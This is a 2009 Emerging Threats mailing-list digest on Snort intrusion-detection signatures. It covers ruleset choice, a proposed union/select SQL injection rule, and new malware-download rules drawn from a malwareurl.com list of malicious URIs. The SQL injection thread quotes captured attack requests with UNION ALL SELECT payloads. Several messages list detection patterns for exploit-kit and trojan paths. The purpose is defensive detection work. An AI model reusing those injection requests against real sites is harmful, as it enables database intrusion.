> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20091203/804e59ea/attachment.html

From scheidell at secnap.net  Thu Dec  3 12:39:22 2009
From: scheidell at secnap.net (Michael Scheidell)
Date: Thu, 03 Dec 2009 12:39:22 -0500
Subject: [Emerging-Sigs] Is the VRT ruleset worth it?
In-Reply-To: <ab3c24b60912030931r43c840fu228045e742dcfcb9@mail.gmail.com>
References: <6116b9e20912030906p7647df0exa625f9c71b4b3fa1@mail.gmail.com>
	<ab3c24b60912030931r43c840fu228045e742dcfcb9@mail.gmail.com>
Message-ID: <4B17F7CA.5060700@secnap.net>

Guise McAllaster wrote:
> I think everyone has to form their own opinion on this issue but I've 
> always thought of using the VRT ruleset alongside the ET ruleset as 
> wearing two condoms -- it doesn't offer more protection and it 
> decreases sensitivity.
>
but condoms have a 10 to 18% failure rate!

<http://en.wikipedia.org/wiki/Condom#Effectiveness>

each has its place, and if you load both sets up without tweaking them 
you will not be doing yourself any good.

(I use oinkmaster to disable, enable rules and modify parma)


-- 
Michael Scheidell, CTO
Phone: 561-999-5000, x 1259
 > *| *SECNAP Network Security Corporation

    * Certified SNORT Integrator
    * 2008-9 Hot Company Award Winner, World Executive Alliance
    * Five-Star Partner Program 2009, VARBusiness
    * Best Anti-Spam Product 2008, Network Products Guide
    * King of Spam Filters, SC Magazine 2008


_________________________________________________________________________
This email has been scanned and certified safe by SpammerTrap(r). 
For Information please see http://www.spammertrap.com
_________________________________________________________________________
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20091203/5843f4c2/attachment.html

From jonkman at jonkmans.com  Thu Dec  3 13:51:28 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 3 Dec 2009 13:51:28 -0500
Subject: [Emerging-Sigs] Is the VRT ruleset worth it?
In-Reply-To: <6116b9e20912030906p7647df0exa625f9c71b4b3fa1@mail.gmail.com>
References: <6116b9e20912030906p7647df0exa625f9c71b4b3fa1@mail.gmail.com>
Message-ID: <04550DFF-5D70-4BD9-919A-098E0B1FD807@jonkmans.com>

Very good question, I get asked it frequently in consulting. 

My answer is you need both. Your points are valid, SF goes after the top 20 sans, the latest and greatest netbios exploit, etc. Safe reliable and well tested stuff.

ET is more malware, we have a huge sandnet and a lot of other intelligence gathering going on. If you want to catch command and control channels, the latest and greatest outbreaks, you need the ET set. 

So I recommend running them in parallel, but you have to do some tweaking to eliminate duplications and get rid of the rules you're not interested in as always. 

Now can you live with one rulset or the other? Yes. You can make it with just VRT. You'll miss some malware but it'll get caught other ways. You can make it with just ET, you may miss some netbios exploit but you'll catch the command and control channel. But you're best off with both. Each have unique good things, especially in the policy areas, etc. 

Now do you subscribe to VRT to beat the 30 day lag? That's totally up to you. Run it for a bit and see if you're missing anything I suppose. 

I'm very interested to hear other opinions on this, but lets not go SF bashing, as much fun as that is. :)

Matt

On Dec 3, 2009, at 12:06 PM, Mike Cox wrote:

> Let me preface this by saying I am not trying to start a flame war or troll so please don't take it that way.
> 
> As I understand it, the ET sigs are more malware/trojan based and the VRT sigs are more exploit/general vulnerability based.  I am considering subscribing to the VRT ruleset and am curious as to people's experience and opinions about doing so.  Is it worth it?  What benefit do you get?  From what I can tell, you get rules 30 days in advance of the rest of the world.  This can be nice for thinks like MS patches and flash 0day but still, is it worthwhile?  Also, I am concerned about a lot of false positives and as I understand it, a lot of rules are released GID 3 which means when I see alerts, I can't inspect the rule in order to see why it fired and determine if it is a false positive or not.
> 
> All feedback is welcome.  Feel free to email me off list if you don't want to broadcast your opinion to everyone here.  Thanks.
> 
> Mike Cox
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs


----------------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
----------------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc




From overlander7 at gmail.com  Thu Dec  3 11:23:07 2009
From: overlander7 at gmail.com (Overlander)
Date: Thu, 3 Dec 2009 11:23:07 -0500
Subject: [Emerging-Sigs] Generic union/select SQL injection rule
Message-ID: <7c19f43c0912030823w6796ca02ic34641fc3dc16177@mail.gmail.com>

The ET rules for detecting "varchar(" (sid:2008175) and "exec("
(sid:2008176) in URIs have always worked pretty well detecting SQL
injection, with little false positive in our environment.  How about the
following rule for detecting union/select attacks.  Ran it overnight, with
no FP yet,  and it's catching the examples below.  Parts of the URI are
redacted.  The second example would have been detected by sid:2010343, if
enabled, since it had the pangolin user agent string.


alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Union Select
in URI"; flow:established,to_server; uricontent:"union"; nocase;
uricontent:"select"; nocase; within:20; classtype:attempted-admin;
sid:7009328; rev:1;)


GET /xx/xx/xx+UniON+aLL+seLECT+1,2,3,4,5,6,7--

GET
/xx/xx/xx%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--%20and%201=1
User-Agent:pangolin/1.2

GET
/xx/xx/xx%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20091203/24d8a64d/attachment.html

From jonkman at jonkmans.com  Thu Dec  3 14:07:46 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 3 Dec 2009 14:07:46 -0500
Subject: [Emerging-Sigs] Malwareurl.com Top 30 Update
In-Reply-To: <4B173E27.2080600@windstream.net>
References: <F236CDCE34685A458D315422458642E201D307E5@pine.nhrs.org>
	<4B173E27.2080600@windstream.net>
Message-ID: <AB1458FF-1646-42C8-B39D-11F69D669AB3@jonkmans.com>

If they were posted I probably missed them. I'm a bit scared of falses on that though. What's the general concensus: are we going to see too many legitimate things using installer as a file name?

Matt


On Dec 2, 2009, at 11:27 PM, waldo kitty wrote:

> 
> were the installer_1.exe and installer.1.exe ones missed? i know that someone 
> posted something on them but don't recall if they were accepted or not... it may 
> have been "install" instead of "installer" but there's two of 'em in the list a 
> few lines apart...
> 
> Weir, Jason wrote:
>> Matt,
>> 
>> Let me know the sig # and I'll update the list..
>> 
>> -J
>> 
>> -----Original Message-----
>> From: Matthew Jonkman [mailto:jonkman at jonkmans.com] 
>> Sent: Tuesday, December 01, 2009 3:02 PM
>> To: Weir, Jason
>> Cc: emerging-sigs at emergingthreats.net
>> Subject: Re: [Emerging-Sigs] Malwareurl.com Top 30 Update
>> 
>> 
>> I like "flash-HQ-plugin.40000.exe" for a sig. Will post something. 
>> 
>> Anyone see anything else we need to get in this list?
>> 
>> Matt
>> 
>> 
>> _____________________________________________________________________________________________
>> 
>> Please visit www.nhrs.org to subscribe to NHRS email announcements and updates.
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>> 
> 
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs


----------------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
----------------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc




From jonkman at jonkmans.com  Thu Dec  3 14:09:42 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 3 Dec 2009 14:09:42 -0500
Subject: [Emerging-Sigs] Malwareurl.com Top 30 Update
In-Reply-To: <6116b9e20912020630o41a5df3cm9c319dfdfa3b437e@mail.gmail.com>
References: <MAILW1GVKjj5EYhAewO00000011@mail.nhrs.org>
	<6116b9e20912020630o41a5df3cm9c319dfdfa3b437e@mail.gmail.com>
Message-ID: <AF797123-E374-4A63-BEA8-59ADED4B0186@jonkmans.com>

You do have to be quick to beat Kevin! :)

Posting these now, thanks Mike!

Matt

On Dec 2, 2009, at 9:30 AM, Mike Cox wrote:

> Thanks for this intel Jason.  I know these are simple signatures but I figure I'd beat Kevin Ross to it:
> 
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET CURRENT_EVENTS MALWARE Potential Malware Download, rogue antivirus downloader (installer.1.exe)"; flow:established,to_server; uricontent:"/installer.1.exe"; nocase; classtype:bad-unknown; reference:url,malwareurl.com; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads; sid:2010xxx; rev:1;)
> 
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET CURRENT_EVENTS MALWARE Potential Malware Download, pdf exploit"; flow:established,to_server; uricontent:"/ssp/files/annonce.pdf"; nocase; classtype:bad-unknown; reference:url,malwareurl.com; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads; sid:2010xxx; rev:1;)
> 
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET CURRENT_EVENTS MALWARE Potential Malware Download, java exploit"; flow:established,to_server; uricontent:"/ssp/files/sdfg.jar"; nocase; classtype:bad-unknown; reference:url,malwareurl.com; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads; sid:2010xxx; rev:1;)
> 
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET CURRENT_EVENTS MALWARE Potential Malware Download, loadjavad.php exploit"; flow:established,to_server; uricontent:"/ssp/loadjavad.php"; nocase; classtype:bad-unknown; reference:url,malwareurl.com; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads; sid:2010xxx; rev:1;)
> 
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET CURRENT_EVENTS MALWARE Potential Malware Download, rogue antivirus (IAInstall.exe)"; flow:established,to_server; uricontent:"/download/IAInstall.exe"; nocase; classtype:bad-unknown; reference:url,malwareurl.com; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads; sid:2010xxx; rev:1;)
> 
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET CURRENT_EVENTS MALWARE Potential Malware Download, trojan zbot"; flow:established,to_server; uricontent:"/globaldirectory/updatetool.exe"; nocase; classtype:bad-unknown; reference:url,malwareurl.com; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads; sid:2010xxx; rev:1;)
> 
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET CURRENT_EVENTS MALWARE Potential Malware Download, exploit redirect"; flow:established,to_server; uricontent:"/fkzd/2.htm"; nocase; classtype:bad-unknown; reference:url,malwareurl.com; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads; sid:2010xxx; rev:1;)
> 
> Finally, I know SID 2010050 covers this but here is how I would do it:
> 
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET CURRENT_EVENTS MALWARE Potential Malware Download, rogue antivirus"; flow:established,to_server; uricontent:"/download/Antivirus_"; nocase; uricontent:".exe"; nocase; pcre:"/download\x2FAntivirus_\d+\x2Eexe/Ui"; classtype:bad-unknown; reference:url,malwareurl.com; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads; sid:2010xxx; rev:1;)
> 
> -Mike Cox
> 
> On Wed, Dec 2, 2009 at 6:51 AM, <jason.weir at nhrs.org> wrote:
> MalewareURL.com Data Contains 29827 Entries - Here are the top 30 (6417)
> 
> #    Signature       URI                                                Count    Description
> ----------------------------------------------------------------------------------------
> 
> 1    none            cache/readme.pdf                                   941      exploits / redirects to exploits
> 2    none            index.php                                          919      exploits / redirects to exploits
> 3    2010222         ts/in.cgi?pepsi18                                  895      exploits / redirects to exploits
> 4    none            download/install.php                               296      rogue antivirus downloader / internetantiviruspro
> 5    none            cache/flash.swf                                    276      exploits / redirects to exploits
> 6    new             downloader.php                                     180      fraudtool.win32.roguesecurity
> 7    2010440         flash-HQ-plugin.40000.exe                          167      fast flux trojan
> 8    2010050         download/Antivirus_21.exe                          149      rogue antivirus / personal antivirus - fakexpa
> 9    none            installer.1.exe                                    147      rogue antivirus downloader / fakeplus
> 10   new             ssp/js/common.js                                   138      exploit kit / trojan oficla
> 11   new             ssp/files/annonce.pdf                              138      exploit kit / trojan oficla
> 12   new             ssp/files/sdfg.jar                                 138      exploit kit / trojan oficla
> 13   new             ssp/admin.php                                      138      exploit kit / trojan oficla
> 14   new             ssp/index.php                                      138      exploit kit / trojan oficla
> 15   new             ssp/load.exe                                       138      exploit kit / trojan oficla
> 16   new             ssp/loadjavad.php                                  138      exploit kit / trojan oficla
> 17   new             download/IAInstall.exe                             125      rogue antivirus downloader / internetantiviruspro
> 18   none            index.php                                          123      exploits
> 19   2010221         3/installer/Installer.exe                          123      trojan fakerean
> 20   2010221         1/installer/Installer.exe                          123      trojan fakerean
> 21   2010221         2/installer/Installer.exe                          123      trojan fakerean
> 22   new             rsf/loadjavad.php                                  111      exploits / trojan oficla
> 23   new             rsf/files/annonce.pdf                              111      exploits / trojan oficla
> 24   new             rsf/files/sdfg.jar                                 111      exploits / trojan oficla
> 25   new             rsf/js/common.js                                   111      exploits / trojan oficla
> 26   new             rsf/index.php                                      111      exploits / trojan oficla
> 27   new             hitin.php                                          89       fraudtool.win32.roguesecurity
> 28   none            download.php                                       82       fraudtool.win32.roguesecurity
> 29   none            fkzd/2.htm                                         70       directs to exploits
> 30   new             globaldirectory/updatetool.exe                     68       trojan zbot
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
> 
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs


----------------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
----------------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc




From jonkman at jonkmans.com  Thu Dec  3 14:18:58 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 3 Dec 2009 14:18:58 -0500
Subject: [Emerging-Sigs] Malwareurl.com Top 30 Update
In-Reply-To: <6116b9e20912020630o41a5df3cm9c319dfdfa3b437e@mail.gmail.com>
References: <MAILW1GVKjj5EYhAewO00000011@mail.nhrs.org>
	<6116b9e20912020630o41a5df3cm9c319dfdfa3b437e@mail.gmail.com>
Message-ID: <78FB41C9-0DD0-4313-AD6D-9410B1E8345E@jonkmans.com>

I agree with you on this better way to do 2010050. Updated, thanks Mike!

Matt

On Dec 2, 2009, at 9:30 AM, Mike Cox wrote:

> uricontent:"/download/Antivirus_"; nocase; uricontent:".exe"; nocase; pcre:"/download\x2FAntivirus_\d+\x2Eexe/Ui";


----------------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
----------------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc




From emerging at emergingthreats.net  Thu Dec  3 16:00:16 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Thu,  3 Dec 2009 16:00:16 -0500 (EST)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20091203210016.B94CE4502D@goliath.jonkmans.com>


[***] Results from Oinkmaster started Thu Dec  3 16:00:16 2009 [***]

[+++]          Added rules:          [+++]

 2010443 - ET CURRENT_EVENTS MALWARE Potential Malware Download, rogue antivirus downloader (installer.1.exe) (emerging-current_events.rules)
 2010444 - ET CURRENT_EVENTS MALWARE Potential Malware Download, pdf exploit (emerging-current_events.rules)
 2010445 - ET CURRENT_EVENTS MALWARE Potential Malware Download, java exploit (emerging-current_events.rules)
 2010446 - ET CURRENT_EVENTS MALWARE Potential Malware Download, loadjavad.php exploit (emerging-current_events.rules)
 2010447 - ET CURRENT_EVENTS MALWARE Potential Malware Download, rogue antivirus (IAInstall.exe) (emerging-current_events.rules)
 2010448 - ET CURRENT_EVENTS MALWARE Potential Malware Download, trojan zbot (emerging-current_events.rules)
 2010449 - ET CURRENT_EVENTS MALWARE Potential Malware Download, exploit redirect (emerging-current_events.rules)


[///]     Modified active rules:     [///]

 2010050 - ET CURRENT_EVENTS MALWARE Likely Rogue Antivirus Download - Antivirus_21.exe (emerging-current_events.rules)
 2010441 - ET TROJAN Possible Storm Variant HTTP Post (S) (emerging-virus.rules)
 2010442 - ET TROJAN Possible Storm Variant HTTP Post (U) (emerging-virus.rules)


[+++]      Added non-rule lines:     [+++]

     -> Added to emerging-current_events.rules (1):
        #by mike cox

     -> Added to emerging-sid-msg.map (9):
        2010441 || ET TROJAN Possible Storm Variant HTTP Post (S) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Storm || url,doc.emergingthreats.net/2010441 || url,www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf || url,cyber.secdev.ca/2009/11/russian-malware-bundle
        2010442 || ET TROJAN Possible Storm Variant HTTP Post (U) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Storm || url,doc.emergingthreats.net/2010442 || url,www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf || url,cyber.secdev.ca/2009/11/russian-malware-bundle
        2010443 || ET CURRENT_EVENTS MALWARE Potential Malware Download, rogue antivirus downloader (installer.1.exe) || url,doc.emergingthreats.net/2010443 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads || url,malwareurl.com
        2010444 || ET CURRENT_EVENTS MALWARE Potential Malware Download, pdf exploit || url,doc.emergingthreats.net/2010444 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads || url,malwareurl.com
        2010445 || ET CURRENT_EVENTS MALWARE Potential Malware Download, java exploit || url,doc.emergingthreats.net/2010445 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads || url,malwareurl.com
        2010446 || ET CURRENT_EVENTS MALWARE Potential Malware Download, loadjavad.php exploit || url,doc.emergingthreats.net/2010446 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads || url,malwareurl.com
        2010447 || ET CURRENT_EVENTS MALWARE Potential Malware Download, rogue antivirus (IAInstall.exe) || url,doc.emergingthreats.net/2010447 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads || url,malwareurl.com
        2010448 || ET CURRENT_EVENTS MALWARE Potential Malware Download, trojan zbot || url,doc.emergingthreats.net/2010448 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads || url,malwareurl.com
        2010449 || ET CURRENT_EVENTS MALWARE Potential Malware Download, exploit redirect || url,doc.emergingthreats.net/2010449 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads || url,malwareurl.com

     -> Added to emerging-sid-msg.map.txt (9):
        2010441 || ET TROJAN Possible Storm Variant HTTP Post (S) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Storm || url,doc.emergingthreats.net/2010441 || url,www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf || url,cyber.secdev.ca/2009/11/russian-malware-bundle
        2010442 || ET TROJAN Possible Storm Variant HTTP Post (U) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Storm || url,doc.emergingthreats.net/2010442 || url,www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf || url,cyber.secdev.ca/2009/11/russian-malware-bundle
        2010443 || ET CURRENT_EVENTS MALWARE Potential Malware Download, rogue antivirus downloader (installer.1.exe) || url,doc.emergingthreats.net/2010443 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads || url,malwareurl.com
        2010444 || ET CURRENT_EVENTS MALWARE Potential Malware Download, pdf exploit || url,doc.emergingthreats.net/2010444 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads || url,malwareurl.com
        2010445 || ET CURRENT_EVENTS MALWARE Potential Malware Download, java exploit || url,doc.emergingthreats.net/2010445 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads || url,malwareurl.com
        2010446 || ET CURRENT_EVENTS MALWARE Potential Malware Download, loadjavad.php exploit || url,doc.emergingthreats.net/2010446 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads || url,malwareurl.com
        2010447 || ET CURRENT_EVENTS MALWARE Potential Malware Download, rogue antivirus (IAInstall.exe) || url,doc.emergingthreats.net/2010447 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads || url,malwareurl.com
        2010448 || ET CURRENT_EVENTS MALWARE Potential Malware Download, trojan zbot || url,doc.emergingthreats.net/2010448 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads || url,malwareurl.com
        2010449 || ET CURRENT_EVENTS MALWARE Potential Malware Download, exploit redirect || url,doc.emergingthreats.net/2010449 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads || url,malwareurl.com

[---]     Removed non-rule lines:    [---]

     -> Removed from emerging-sid-msg.map (18):
        2010441 || ET TROJAN Possible Storm Variant HTTP Post (S) || url,www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf || url,cyber.secdev.ca/2009/11/russian-malware-bundle
        2010442 || ET TROJAN Possible Storm Variant HTTP Post (U) || url,www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf || url,cyber.secdev.ca/2009/11/russian-malware-bundle
        2500554 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (278) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500555 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (278) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500556 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (279) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500557 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (279) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500558 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (280) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500559 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (280) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500560 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (281) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500561 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (281) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510554 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (278) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510555 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (278) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510556 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (279) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510557 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (279) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510558 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (280) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510559 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (280) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510560 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (281) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510561 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (281) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Removed from emerging-sid-msg.map.txt (18):
        2010441 || ET TROJAN Possible Storm Variant HTTP Post (S) || url,www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf || url,cyber.secdev.ca/2009/11/russian-malware-bundle
        2010442 || ET TROJAN Possible Storm Variant HTTP Post (U) || url,www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf || url,cyber.secdev.ca/2009/11/russian-malware-bundle
        2500554 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (278) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500555 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (278) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500556 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (279) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500557 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (279) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500558 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (280) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500559 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (280) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500560 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (281) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500561 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (281) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510554 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (278) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510555 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (278) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510556 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (279) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510557 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (279) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510558 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (280) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510559 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (280) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510560 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (281) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510561 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (281) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts


From kevross33 at googlemail.com  Thu Dec  3 16:31:20 2009
From: kevross33 at googlemail.com (Kevin Ross)
Date: Thu, 3 Dec 2009 21:31:20 +0000
Subject: [Emerging-Sigs] Malwareurl.com Top 30 Update
In-Reply-To: <AF797123-E374-4A63-BEA8-59ADED4B0186@jonkmans.com>
References: <MAILW1GVKjj5EYhAewO00000011@mail.nhrs.org>
	<6116b9e20912020630o41a5df3cm9c319dfdfa3b437e@mail.gmail.com>
	<AF797123-E374-4A63-BEA8-59ADED4B0186@jonkmans.com>
Message-ID: <e75cc74a0912031331u2963e2f6s3cbb09592c2600a6@mail.gmail.com>

lol :) I am not in any rush to write lots of sigs, I have my mug now :) Now
I am improving on my very first snort sigs that work but possibly could be
tweaked for performance.

Kev

2009/12/3 Matt Jonkman <jonkman at jonkmans.com>

> You do have to be quick to beat Kevin! :)
>
> Posting these now, thanks Mike!
>
> Matt
>
